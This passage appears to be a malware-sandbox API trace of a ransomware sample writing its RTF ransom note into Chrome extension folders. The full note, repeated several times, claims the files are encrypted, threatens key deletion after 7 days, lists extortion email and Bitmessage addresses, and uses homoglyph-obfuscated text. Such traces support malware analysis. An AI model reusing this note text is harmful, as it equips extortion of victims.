bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0289.196] WriteFile (in: hFile=0x2d4, lpBuffer=0x1ee8a78*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ee8a78*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0289.205] CloseHandle (hObject=0x2d4) returned 1 [0289.205] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\#readme_eman#.rtf")) returned 0xffffffff [0289.205] GetLastError () returned 0x2 [0289.205] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d4 [0289.206] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.206] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.206] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me 